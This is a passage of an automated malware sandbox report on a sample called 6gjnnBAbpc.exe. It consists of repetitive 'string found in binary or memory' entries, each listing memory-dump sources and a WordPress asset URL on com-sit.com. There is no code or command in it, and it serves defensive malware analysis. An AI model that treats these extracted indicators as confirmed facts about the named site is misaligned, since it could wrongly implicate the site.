6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/css/be.css?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/css/responsive.css?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/menu.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/parallax/translate3d.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/chart.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/countdown.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/debouncedresize.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/enllax.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/magnificpopup.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/visible.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/plugins/waypoints.min.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/betheme/js/scripts.js?ver=26.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/classic-themes.min.css?ver=1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 